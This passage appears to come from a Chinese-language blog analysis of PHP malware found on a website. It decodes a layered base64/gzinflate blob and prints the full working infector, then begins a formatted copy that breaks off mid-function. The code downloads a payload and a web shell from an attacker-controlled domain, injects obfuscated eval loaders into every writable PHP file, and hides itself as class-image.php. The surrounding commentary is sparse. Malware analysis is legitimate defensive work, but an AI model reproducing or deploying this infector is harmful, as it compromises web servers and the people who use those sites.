wG5Je2lm9SmaVj4c4iomsUjg01+xZrlS+micUNpltBuSXCywxCNp1f5dh0LK1r3qezUzNQuFC+/IDuwLacfbCSRIeG+m2TV8yqu+dHaLyfrB7r6buohspTuAQVYA8Si6tvfhMIa3SJ7Awbb5R9fz/yxxsDyCNZzF8t6Hu9mJgw+GtFTXdj1pt6vDQuMhMDYvW6mxTihUpcUMrEm/HvMXbBB+a3avGrmQuOxU1aEhhrwBFOWkigoSACEGsTeOthAZW/jq2bL3JMxIeurxOdFPT0MvvU9DTPW19Sz4YyweTAp29H26WxJAlZl4LVKZqqVOrNtFoeu2g0BCgXDhoEbbYm37jchndgiIOUa6nEX4JsE+3avz0ceU99P8HASRovUU6dKvGS750oTyCARi+uswd0UAe49n7wYKQzz+UjI/ynfFya4ECVevVPHcH6YvtsFaJFh5gaMEoie1P2SwOBMfDUY5VDnbm0fz4eSGnOY0PoLIWp7m6GZocth1E9RdeOgJC2OQ9sVLb4RUIi+A44FL5buJvz9SF1JJsdnDY/sjsQeOzOB4s6DG2r8FGr2b6ORPaQsfcAESK+Id7M4QF52IVv2SO5g97qiwO6tIZg2A9A4zIeleWH6lyXOMpvhQ8QBEkCx2kQPCHwP//+++9//w8=')));
可以确定是多重压缩编码了。。。
直接用正则和循环,让机器弄吧。。。
$v就是上面那一段。。。
<?php
for (;;) {
preg_match('/^(eval\(gzinflate\(base64_decode\(\')(.*)(\'\)\)\)\;)$/', $v, $match);
if (empty($match[2])) {
print_r($output."\n");
break;
}
$output = gzinflate(base64_decode($match[2]));
$v = $output;
unset($match);
}
?>
还原后呢:
<?php if(!function_exists('dg_main_init')){ function dg_main_init(){ echo"<b color='green'>full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br />[s1]<br />"; echo"{$GLOBALS['dg_iver']}<h2>{$GLOBALS['http']}{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>"; $path = explode("/", $_SERVER['SCRIPT_FILENAME']); array_pop($path); $uri = explode("/", $_SERVER['REQUEST_URI']); $uri = array_slice($uri, 0, count($uri) - 1); while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){ unset($uri[count($uri) - 1]); unset($path[count($path) - 1]); } $GLOBALS['dgsp'] = implode("/", $path); $GLOBALS['fpath'] = $GLOBALS['dgsp']; echo"<b color='green'>root dir path [{$GLOBALS['dgsp']}/]</b><br /><br />"; $GLOBALS['dgcgr'] = 0; $GLOBALS['dgcgrf'] = 0; dg_main_exec(); } } if(!function_exists('all_php_inject')){ function all_php_inject($folder, $inj = 0, $silent = true){ $our_folder = 0; $folder = str_replace('\\', '/', $folder); if($folder[strlen($folder) - 1] == '/'){ $folder = substr($folder, 0, strlen($folder) - 1); } if(!is_dir($folder)){ if(!$silent){echo"<b>NOT FOLDER</b> <font color='red'>{$folder}</font><br />";} return; } if(is_link($folder)){ if(!$silent){echo"<b>LINK</b> <font color='red'>{$folder}</font><br />";} return; } if(strpos(strtolower($folder), 'cache') || strpos(strtolower($folder), 'snapshot')){ if(!$silent){echo"<b>CACHE</b> <b color='orange'>{$folder}</b><br />";} return; } if($folder . "/" == $GLOBALS['dgcp'] || file_exists($folder . '/' . $GLOBALS['dgin'])){ if(!$silent){echo"<b>MAIN DIR</b> <font color='red'>{$folder}</font><br />";} return; } if(!$silent){echo"{$folder}<br />";} $h = opendir($folder); if(!$h){ if(!$silent){echo"<b>OPENDIR</b> <font color='red'>{$folder}</font><br />";} return; } if(check_engine_rules($folder)){ process_file_inject($GLOBALS['dg_wpi'][count($GLOBALS['dg_wpi']) - 1], 1, 0); } $dirs = array(); while(strlen($f = readdir($h))){ if($f == '.' || $f == '..'){ continue; } $pc = 0; $lp = ""; $file = $folder . '/' . $f; if(is_file($file)){ if(in_array($file, $GLOBALS['dg_wpi'])){ if(!$silent){echo"<b>BUSY</b> <font color='red'>{$file}</font><br />";} continue; } $mfn = substr(md5($folder . '/'), 0, 3) . '.php'; $sfn = substr(md5($mfn), 0, 4) . '.php'; $mkr = md5($file); if($f == $mfn){ if(!$silent){echo"<b>OTHER MS</b> <font color='red'>{$file}</font><br />";} continue; } if($f == $sfn){ if(!$silent){echo"<b>SHELL</b> <font color='red'>{$file}</font><br />";} continue; } if(isset($GLOBALS['dgmn']) && $f == $GLOBALS['dgmn']){ continue; } if(!in_array(strtolower(gfe($file)), array("php","phtml","php3","php4","php5"))){ continue; } if(!is_writable($file)){ if(!$silent){echo"<font color='red'>{$file}</font><br />";} continue; } process_file_inject($file, $inj, $silent); }elseif(is_dir($file)){ $dirs[$file] = count($dirs) + 1; } } closedir($h); foreach($dirs as $key=>$val){ all_php_inject($key, $inj, $silent); } } } if(!function_exists('clear_get_post_vars')){ function clear_get_post_vars($var){ $var = rawurldecode($var); if(get_magic_quotes_gpc() || strpos($var,'\\"')){ $var = stripslashes($var); } if(strpos($var, '"')){ $var = html_entity_decode($var); } return $var; } } if(!function_exists('process_file_inject')){ function process_file_inject($file, $inj, $silent){ $lc = " <b>[not patched]</b>"; $lp = ""; $mkr = md5($file); $fa = file($file); $oc = implode("", $fa); $nc = $oc; /*dg_clear_exploits($nc);*/ while(preg_match("/{$GLOBALS['dgix']}/si", $nc, $_r)){ if(preg_match('/md5\s+\=\s+\"(\w{32})\"/si', $_r[0], $_m)){ if($_m[1] == '00000000000000000000000000000000'){ echo "<b>BOMB</b> <font color='blue'>{$file}</font><br />"; }elseif($_m[1] == $mkr){ $lc = " <b>[cleared]</b>"; }elseif($_m[1] <> $mkr){ $lc = " <b>[other script]</b>"; } } $nc = trim(str_replace($_r[0], $_r[1], $nc)); } $nc = trim(preg_replace("/\<\?php\s*\?\>/s", "", $nc)); if(preg_match("/\@zend/i", $nc)){ echo "<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br />"; }elseif($inj){ $inject = prepare_pack($GLOBALS['dgij'], rand(20, 50), 0, 1); if(in_array($file, $GLOBALS['dg_wpi'])){ $tmp = preg_split('/\}\s*[\r\n]+\s*function/siU', $nc); if(count($tmp) > 1){ $inject = hide_eval($inject, 0, $mkr); $middle = round(count($tmp) / 2); $nc = ''; $dgi = 0; foreach($tmp as $key=>$val){ $dgi++; if($dgi == count($tmp)){ $nc = $nc.$val; }else{ if($dgi == $middle){ $nc = $nc.$val."}\n\n{$inject}\nfunction"; }else{ $nc = $nc.$val."}\n\nfunction"; } } } }else{ $tmp = preg_split('/\*\/\s*[\r\n]+\s*function/siU', $nc); if(count($tmp) > 1){ $inject = hide_eval($inject, 0, $mkr); $middle = round(count($tmp) / 2); $nc = ''; $dgi = 0; foreach($tmp as $key=>$val){ $dgi++; if($dgi == count($tmp)){ $nc = $nc.$val; }else{ if($dgi == $middle){ $nc = $nc.$val."*/\n\n{$inject}\nfunction"; }else{ $nc = $nc.$val."*/\n\nfunction"; } } } }else{ $inject = hide_eval($inject, 1, $mkr); $nc = $inject . "\n" . trim($nc); } } }else{ $inject = hide_eval($inject, 1, $mkr); $nc = $inject . "\n" . trim($nc); } $lp = " <b>[patched]</b>"; } if($oc <> $nc){ if(save_text_to_file($file, $nc, 1)){ echo "<font color='green'>{$file}{$lc}{$lp}</font><br />"; }else{ echo "<font color='red'>{$file}{$lc}{$lp}</font><br />"; } } } } if(!function_exists('leave_clear_php')){ function leave_clear_php(&$txt){ $txt = substr($txt, strpos($txt, '<?'), strlen($txt)); $txt = substr($txt, 0, strrpos($txt, '?>') + 2); } } if(!function_exists('check_engine_install')){ function check_engine_install(){ global $_POST; if(!isset($_POST['dgrules']) || trim($_POST['dgrules']) == ""){ return; } $_POST['dgrules'] = trim(clear_get_post_vars($_POST['dgrules'])); $GLOBALS['dgrules'] = explode(";", $_POST['dgrules']); $tmp = explode("/", $GLOBALS['dgcp']); while(count($tmp) > 0){ $path = implode("/", $tmp); if(check_engine_rules($path)){ break; } unset($tmp[count($tmp) - 1]); } } } if(!function_exists('check_engine_rules')){ function check_engine_rules($path){ foreach($GLOBALS['dgrules'] as $key=>$val){ $val = trim($val); $search_path = explode("@#@", $val); $all_found = 1; foreach($search_path as $key2=>$val2){ $val2 = trim($val2); if(in_array($path . $val2, $GLOBALS['dg_wpi'])){ return 0; } if(!(file_exists($path . $val2))){ $all_found = 0; break; } } if($all_found){ foreach($search_path as $key2=>$val2){ if(is_writable($path . $val2)){ $GLOBALS['dg_wpi'][] = $path . $val2; echo "<font color='blue'>engine path {$path}{$val2}</font><br />"; return 1; } } return 0; } } return 0; } } if(!function_exists('dgdownload')){ function dgdownload($url, $connect_timeout){ if(!$url){return '';} $ret = ''; $url_info = parse_url($url); if(!isset($url_info['port']) || !$url_info['port']){ $url_info['port'] = 80; } if(!isset($url_info['path']) || !$url_info['path']){ $url_info['path'] = '/'; } if(isset($url_info['query']) && $url_info['query']){ $url_info['path'] = $url_info['path'] . "?" . $url_info['query']; } $query = "GET {$url_info['path']} HTTP/1.0\r\n"; $query .= "Host: {$url_info['host']}\r\n"; $query .= "Accept: */*\r\n"; $query .= "Connection: close\r\n"; $query .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12\r\n"; $query = $query . "\r\n"; $errno = 0; $error = ""; $sock = fsockopen($url_info['host'], $url_info['port'], $errno, $error, $connect_timeout); $h = array(); $resp = array(); if($sock){ stream_set_timeout($sock, $connect_timeout); fwrite($sock, $query); $hd = false; while(!feof($sock)){ $l = fgets($sock); if(!$hd){ if(trim($l) == ''){ $hd = true; }else{ $h[] = $l; } }else{ $resp[] = $l; } } fclose($sock); } $ret = implode("", $resp); return $ret; } } if(!function_exists('save_text_to_file')){ function save_text_to_file($fn, $t, $r = 0){ if($r){ $f = fopen($fn, "w"); }else{ $f = fopen($fn, "a"); } if($f){ fwrite($f, $t); fflush($f); fclose($f); $fs = filesize($fn); if(($t <> '' && $fs) || ($t == '' && !$fs)){ return 1; }else{ $fn = str_replace("/", "\\", $fn); $fs = filesize($fn); } if(($t <> '' && $fs) || ($t == '' && !$fs)){ return 1; } }else{ return 0; } } } if(!function_exists('replace_substring')){ function replace_substring(&$text, $pret, $postt, $str){ $pos = strpos($text, $pret); if(!$pos){return false;} $pre = substr($text, 0, $pos + strlen($pret)); $pos = strpos($text, $postt, $pos); if(!$pos){return false;} $post = substr($text, $pos, strlen($text)); if(strlen($pre) && strlen($post)){ $text = $pre.$str.$post; return true; } return false; } } if(!function_exists('gfe')){ function gfe($fn){ $ret = pathinfo($fn); if(isset($ret['extension'])){ return $ret['extension']; }else{ return ""; } } } if(!function_exists('prepare_pack')){ function prepare_pack($php, $cycles = 0, $split_by_functions = 0, $zip = 0){ $ret = preg_replace("/^[^\s]+[\s]/U", "", $php); $ret = preg_replace("/[\s][^\s]+\Z/", "", $ret); $ret = trim($ret); if($split_by_functions){ $tmp = preg_split('/\}\s+function/', $ret); }else{ $tmp[] = $ret; } $skip_first = false; if(count($tmp)){ if($split_by_functions && strpos($tmp[0], 'function') === 0){ $tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0])); }else{ $skip_first = true; } $ret = ''; $count = 0; $total = count($tmp); foreach($tmp as $key=>$val){ $val = preg_replace("/\s+/", " ", $val); $count++; $count == $total ? $add = '' : $add = '}'; if($total > 1 && !($count == 1 && $skip_first)){ $next_encoded = '/*' . generate_string(50) . '*/ ' . 'function ' . trim($val) . $add; }else{ $next_encoded = trim($val).$add; } if($zip && function_exists('gzdeflate')){ $next_encoded = gzdeflate($next_encoded, 9); } $next_encoded = base64_encode($next_encoded); if($zip && function_exists('gzdeflate')){ $ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));"; }else{ $ret .= "eval(base64_decode('{$next_encoded}'));"; } } for($i = 0; $i < $cycles; $i++){ if($zip && function_exists('gzdeflate')){ $ret = gzdeflate($ret, 9); } $ret = base64_encode($ret); if($zip && function_exists('gzdeflate')){ $ret = "eval(gzinflate(base64_decode('{$ret}')));"; }else{ $ret = "eval(base64_decode('{$ret}'));"; } } } return $ret; } } if(!function_exists('hide_eval')){ function hide_eval($encoded_gzipped_code, $add_php_sign = 0, $marker = ""){ $ret = ""; $replacement = "eval(gzinflate(base64_decode('"; $pos = strpos($encoded_gzipped_code, $replacement); if(!($pos === false)){ $encoded_gzipped_code = substr($encoded_gzipped_code, $pos + strlen($replacement), strlen($encoded_gzipped_code)); } $replacement = "')));"; $pos = strpos($encoded_gzipped_code, $replacement); if(!($pos === false)){ $encoded_gzipped_code = substr($encoded_gzipped_code, 0, $pos); } $l = array("e","v","a","l","g","z","i","n","f","t","b","s","6","4","_","d","c","r","o","(",")",";","$"); shuffle($l); $l = array_flip($l); $a = "("; foreach($l as $k=>$val){ rand(0, 100) < 50 ? $sep = "'" : $sep = '"'; $a .= "{$sep}{$k}{$sep},"; } $a = substr($a, 0, strlen($a) - 1) . ");"; if($marker){ $ret .= "\$"."md5 = \"{$marker}\";\n"; } $ret .= "\${$GLOBALS['dgeha']} = array{$a}\n"; $ret .= "\${$GLOBALS['dgehf']} = create_function('\$'.'v',\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['v']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['l']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['g']}].\${$GLOBALS['dgeha']}[{$l['z']}].\${$GLOBALS['dgeha']}[{$l['i']}].\${$GLOBALS['dgeha']}[{$l['n']}].\${$GLOBALS['dgeha']}[{$l['f']}].\${$GLOBALS['dgeha']}[{$l['l']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['t']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['b']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['s']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['6']}].\${$GLOBALS['dgeha']}[{$l['4']}].\${$GLOBALS['dgeha']}[{$l['_']}].\${$GLOBALS['dgeha']}[{$l['d']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['c']}].\${$GLOBALS['dgeha']}[{$l['o']}].\${$GLOBALS['dgeha']}[{$l['d']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['$']}].\${$GLOBALS['dgeha']}[{$l['v']}].\${$GLOBALS['dgeha']}[{$l[')']}].\${$GLOBALS['dgeha']}[{$l[')']}].\${$GLOBALS['dgeha']}[{$l[')']}].\${$GLOBALS['dgeha']}[{$l[';']}]);\n"; $ret .= "\${$GLOBALS['dgehf']}('{$encoded_gzipped_code}');\n"; $ret = trim($ret); if($add_php_sign){ $ret = "<"."?php\n" . $ret . "\n?".">"; } return $ret; } } if(!function_exists('generate_string')){ function generate_string($len = 4){ $ret = ''; $arr = array('q','w','e','r','t','y','u','i','o','p','a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m'); for($i = 0; $i < $len; $i++){ $ret .= $arr[rand(0, count($arr) - 1)]; } return $ret; } } if(!function_exists('search_writable_dirs')){ function search_writable_dirs($folder, &$madrs, &$flag){ if($flag){ return; } $folder = str_replace('\\', '/', $folder); if(count($madrs) > 300){ return; } if(isset($GLOBALS['dgbc'][$folder . "\n"])){ echo"<b>CHECKED</b> <font color='yellow'>{$folder}</font><br />"; return; } if(!file_exists($folder)){ echo"<b>NOT EXISTS</b> <font color='red'>{$folder}</font><br />"; return; } if(strpos(strtolower($folder), 'cache') || strpos(strtolower($folder), 'snapshot')){ echo"<b>CACHE</b> <font color='orange'>{$folder}</font><br />"; return; } $h = opendir($folder); if(!$h){ return; } if(is_writable($folder)){ $fn = substr(md5($folder . '/'), 0, 3) . '.php'; if(file_exists($folder . '/' . $fn) || file_exists($folder . '/cnf')){ echo"<b>OLD SCRIPT</b> <b color='red'>{$folder}/{$fn}</b><br />[m1]<br />"; $madrs = array(); $madrs[$folder] = count($madrs) + 1; $flag = 1; return; } $madrs[$folder] = count($madrs) + 1; } while(($f = readdir($h)) !== FALSE){ if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){ continue; } if($folder == '/'){ $folder = ''; } if(is_dir($folder . '/' . $f)){ if(is_link($folder . '/' . $f)){ continue; } if(strpos($folder . '/' . $f . '/', $GLOBALS['dgsp']) === false){ echo"<b color='red'>SKIP: {$folder}/{$f}</b><br />"; continue; } search_writable_dirs($folder . '/' . $f, $madrs, $flag); } } closedir($h); flush(); } } if(!function_exists('dg_main_exec')){ function dg_main_exec(){ global $_SERVER; echo"<hr /><div align='left'><br clear='all'>"; flush(); $ddrs = array(); $a = false; $GLOBALS['dgcp'] = ''; echo"<h3>LOOKING FOR THE LONGEST PATH AT {$GLOBALS['dgsp']}</h3><small>"; search_writable_dirs($GLOBALS['dgsp'], $ddrs, $a); echo"</small>";flush(); $max = 0; foreach($ddrs as $key=>$val){ $fldr = explode('/', $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode('/', $fldr); } } if(!$GLOBALS['dgcp']){ echo"<b color='red'>nowhere to write anything</b><br />[e4]"; die; } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ echo"<b color='red'>can't write to the document root</b><br />[e5]"; die; } $GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']); $GLOBALS['dgcp'] .= '/'; $GLOBALS['dgsp'] .= '/'; echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br />"; $GLOBALS['dgin'] = substr(md5($GLOBALS['dgcp']), 0, 3) . '.php'; $GLOBALS['dgeha'] = "a" . substr(md5($GLOBALS['dgin']), 0, 1); $GLOBALS['dgehf'] = "b" . substr(md5($GLOBALS['dgin']), 0, 2); $GLOBALS['dgij'] = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"; flush(); $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo"<b color='green'>[size: " . strlen($pms) . "]</b><br />[s2]<br />"; leave_clear_php($pms); }else{ die("<b color='red'>download failed</b><br />[e2]<br />"); } if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die("<b color='red'>failed to set path</b><br />[e6]"); } echo"<b color='green'>path [{$GLOBALS['dgcp']}]</b><br />"; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die("<b color='red'>failed to set name</b><br />[e7]"); } if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die("<b color='red'>failed to set relative root dir</b><br />[e8]"); } echo"<b color='green'>relative root dir [{$GLOBALS['dgsp']}]</b><br />"; $packed_js = prepare_pack($pms, rand(5, 10), 1, 1); $packed_js = hide_eval($packed_js, 1); if(save_text_to_file($GLOBALS['dgcp'] . $GLOBALS['dgin'], $packed_js, 1)){ echo"<b color='green'>[{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br />[s4]<br />"; }else{ echo"<b color='red'>[{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br />[e9]<br />"; die; } $GLOBALS['dgsf'] = substr(md5($GLOBALS['dgin']), 0, 4) . '.php'; flush(); $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo"<b color='green'>ss [size: " . strlen($shl) . "]</b><br />[s3]<br />"; leave_clear_php($shl); }else{ echo"<b color='red'>download failed</b><br />[e3]<br />"; } $shl = preg_replace("/^[^\s]+[\s]/U", "", $shl); $shl = preg_replace("/[\s][^\s]+\Z/", "", $shl); $shl = '/*' . generate_string(200) . '*/ ' . $shl . ' /*' . generate_string(200) . '*/ '; $packed_js = prepare_pack($shl, rand(50, 100), 0, 1); $packed_js = hide_eval($packed_js, 1); if(save_text_to_file($GLOBALS['dgcp'] . $GLOBALS['dgsf'], $packed_js, 1)){ echo"<b style:='color:green'>[{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br />[s5]<br />"; }else{ echo"<b color='red'>[{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br />"; } echo"<small>"; echo"<h3>INJECTING PHP FILES</h3>"; check_engine_install(); if(count($GLOBALS['dg_wpi']) > 0){ process_file_inject($GLOBALS['dg_wpi'][0], 1, 0); all_php_inject($GLOBALS['dgsp'], 0, 0); }else{ all_php_inject($GLOBALS['dgsp'], 1, 0); } if($_SERVER['SCRIPT_FILENAME'] <> $GLOBALS['dgcp'] . $GLOBALS['dgmn']){ if(copy($_SERVER['SCRIPT_FILENAME'], $GLOBALS['dgcp'] . $GLOBALS['dgmn'])){ echo"File {$_SERVER['SCRIPT_FILENAME']} copied"; }else{ echo"Failed to copy file {$_SERVER['SCRIPT_FILENAME']}"; } unlink($_SERVER['SCRIPT_FILENAME']); }else{ echo"No need to copy file {$_SERVER['SCRIPT_FILENAME']}"; } echo"</small><hr /><b>dgok</b></div>"; } } if(!isset($GLOBALS['dgbaw'])){ $GLOBALS['dgbaw'] = 1; if(isset($_GET['dgphpinfo'])){phpinfo();die;} set_time_limit(1800); ignore_user_abort(true); $GLOBALS['dg_wpi'] = array(); $GLOBALS['dgrules'] = array(); $GLOBALS['dg_iver'] = "4.0"; $GLOBALS['http'] = 'http:/'.'/'; $GLOBALS['dgmn'] = "class-image.php"; $GLOBALS['dgfn'] = ""; $GLOBALS['dg_id'] = ""; $GLOBALS['dgix'] = '\$'.'md5\s\=\s\"\w{32}\"\;\s*\$[^\s]+\s\=\s[^\s]+\;\s*\$[^\s]+\s\=\screate\_function[^\s]+\;\s*\$[^\s]+\s*(\S)'; if(isset($_GET['dgd']) || isset($_POST['dgd'])){ error_reporting(E_ALL); }else{ error_reporting(0); } if($GLOBALS['dgmn'] && (!strpos($_SERVER['SCRIPT_FILENAME'], $GLOBALS['dgmn'])) || !file_exists($_SERVER['SCRIPT_FILENAME'])){ if(file_exists($_SERVER['PATH_TRANSLATED'])){ $_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED']; }else{ echo"<b color='red'>can't detect full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br />[e1]"; die; } } if(!$GLOBALS['dg_id'] && isset($_GET['dgdomain']) && $_GET['dgdomain']){ $GLOBALS['dg_id'] = $_GET['dgdomain']; } if(!$GLOBALS['dg_id'] && isset($_POST['dgdomain']) && $_POST['dgdomain']){ $GLOBALS['dg_id'] = $_POST['dgdomain']; } if((isset($_GET['dginit']) || isset($_POST['dginit']))){ if(!$GLOBALS['dg_id']){ die("[e13]"); } $GLOBALS['dg_pu'] = "{$GLOBALS['http']}{$GLOBALS['dg_id']}/?update=js&host={$_SERVER['HTTP_HOST']}"; $GLOBALS['dg_eu'] = "{$GLOBALS['http']}{$GLOBALS['dg_id']}/?update=shl&host={$_SERVER['HTTP_HOST']}"; $_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']); $_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']); die(dg_main_init()); }else{ die("<!--mn " . $GLOBALS['dgmn'] . "-->"); } } ?>
格式化一下,看看是什么
<?php
if (!function_exists('dg_main_init')) {
function dg_main_init()
{
echo "<b color='green'>full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br />[s1]<br />";
echo "{$GLOBALS['dg_iver']}<h2>{$GLOBALS['http']}{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";
$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
array_pop($path);
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);
while (count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])) {
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
$GLOBALS['dgsp'] = implode("/", $path);
$GLOBALS['fpath'] = $GLOBALS['dgsp'];
echo "<b color='green'>root dir path [{$GLOBALS['dgsp']}/]</b><br /><br />";
$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
dg_main_exec();
}
}
if (!function_exists('all_php_inject')) {
function all_php_inject($folder, $inj = 0, $silent = true)
{
$our_folder = 0;
$folder = str_replace('\\', '/', $folder);
if ($folder[strlen($folder) - 1] == '/') {
$folder = substr($folder, 0, strlen($folder) - 1);
}
if (!is_dir($folder)) {
if (!$silent) {
echo "<b>NOT FOLDER</b> <font color='red'>{$folder}</font><br />";
}
return;
}
if (is_link($folder)) {
if (!$silent) {
echo "<b>LINK</b> <font color='red'>{$folder}</font><br />";
}
return;
}
if (strpos(strtolower($folder), 'cache') || strpos(strtolower($folder), 'snapshot')) {
if (!$silent) {
echo "<b>CACHE</b> <b color='orange'>{$folder}</b><br />";
}
return;
}
if ($folder . "/" == $GLOBALS['dgcp'] || file_exists($folder . '/' . $GLOBALS['dgin'])) {
if (!$silent) {
echo "<b>MAIN DIR</b> <font color='red'>{$folder}</font><br />";
}
return;
}
if (!$silent) {
echo "{$folder}<br />";
}
$h = opendir($folder);
if (!$h) {
if (!$silent) {
echo "<b>OPENDIR</b> <font color='red'>{$folder}</font><br />";
}
return;
}
if (check_engine_rules($folder)) {
process_file_inject($GLOBALS['dg_wpi'][count($GLOBALS['dg_wpi']) - 1], 1, 0);
}
$dirs = array();
while (strlen($f = readdir($h))) {
if ($f == '.' || $f == '..') {
continue;
}
$pc = 0;
$lp = "";
$file = $folder . '/' . $f;
if (is_file($file)) {
if (in_array($file, $GLOBALS['dg_wpi'])) {
if (!$silent) {
echo "<b>BUSY</b> <font color='red'>{$file}</font><br />";
}
continue;
}
$mfn = substr(md5($folder . '/'), 0, 3) . '.php';
$sfn = substr(md5($mfn), 0, 4) . '.php';
$mkr = md5($file);
if ($f == $mfn) {
if (!$silent) {
echo "<b>OTHER MS</b> <font color='red'>{$file}</font><br />";
}
continue;
}
if ($f == $sfn) {
if (!$silent) {
echo "<b>SHELL</b> <font color='red'>{$file}</font><br />";
}
continue;
}
if (isset($GLOBALS['dgmn']) && $f == $GLOBALS['dgmn']) {
continue;
}
if (!in_array(strtolower(gfe($file)), array(
"php",
"phtml",
"php3",
"php4",
"php5"
))) {
continue;
}
if (!is_writable($file)) {
if (!$silent) {
echo "<font color='red'>{$file}</font><br />";
}
continue;
}
process_file_inject($file, $inj, $silent);
} elseif (is_dir($file)) {
$dirs[$file] = count($dirs) + 1;
}
}
closedir($h);
foreach ($dirs as $key => $val) {
all_php_inject($key, $inj, $silent);
}
}
}
if (!function_exists('clear_get_post_vars')) {
function clear_get_post_vars($var)
{
$var = rawurldecode($var);
if (get_magic_quotes_gpc() || strpos($var, '\\"')) {
$var = stripslashes($var);
}
if (strpos($var, '"')) {
$var = html_entity_decode($var);
}
return $var;
}
}
if (!function_exists('process_file_inject')) {
function process_file_inject($file, $inj, $silent)
{
$lc = " <b>[not patched]</b>";
$lp = "";
$mkr = md5($file);
$fa = file($file);
$oc = implode("", $fa);
$nc = $oc;
/*dg_clear_exploits($nc);*/
while (preg_match("/{$GLOBALS['dgix']}/si", $nc, $_r)) {
if (preg_match('/md5\s+\=\s+\"(\w{32})\"/si', $_r[0], $_m)) {
if ($_m[1] == '00000000000000000000000000000000') {
echo "<b>BOMB</b> <font color='blue'>{$file}</font><br />";
} elseif ($_m[1] == $mkr) {
$lc = " <b>[cleared]</b>";
} elseif ($_m[1] <> $mkr) {
$lc = " <b>[other script]</b>";
}
}
$nc = trim(str_replace($_r[0], $_r[1], $nc));
}
$nc = trim(preg_replace("/\<\?php\s*\?\>/s", "", $nc));
if (preg_match("/\@zend/i", $nc)) {
echo "<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br />";
} elseif ($inj) {
$inject = prepare_pack($GLOBALS['dgij'], rand(20, 50), 0, 1);
if (in_array($file, $GLOBALS['dg_wpi'])) {
$tmp = preg_split('/\}\s*[\r\n]+\s*function/siU', $nc);
if (count($tmp) > 1) {
$inject = hide_eval($inject, 0, $mkr);
$middle = round(count($tmp) / 2);
$nc = '';
$dgi = 0;
foreach ($tmp as $key => $val) {
$dgi++;
if ($dgi == count($tmp)) {
$nc = $nc . $val;
} else {
if ($dgi == $middle) {
$nc = $nc . $val . "}\n\n{$inject}\nfunction";
} else {
$nc = $nc . $val . "}\n\nfunction";
}
}
}
} else {
$tmp = preg_split('/\*\/\s*[\r\n]+\s*function/siU', $nc);
if (count($tmp) > 1) {
$inject = hide_eval($inject, 0, $mkr);
$middle = round(count($tmp) / 2);
$nc = '';
$dgi = 0;
foreach ($tmp as $key => $val) {
$dgi++;
if ($dgi == count($tmp)) {
$nc = $nc . $val;
} else {
if ($dgi == $middle) {
$nc = $nc . $val . "*/\n\n{$inject}\nfunction";
} else {
$nc = $nc . $val . "*/\n\nfunction";
}
}
}
} else {
$inject = hide_eval($inject, 1, $mkr);
$nc = $inject . "\n" . trim($nc);
}
}
} else {
$inject = hide_eval($inject, 1, $mkr);
$nc = $inject . "\n" . trim($nc);
}
$lp = " <b>[patched]</b>";
}
if ($oc <> $nc) {
if (save_text_to_file($file, $nc, 1)) {
echo "<font color='green'>{$file}{$lc}{$lp}</font><br />";
} else {
echo "<font color='red'>{$file}{$lc}{$lp}</font><br />";
}
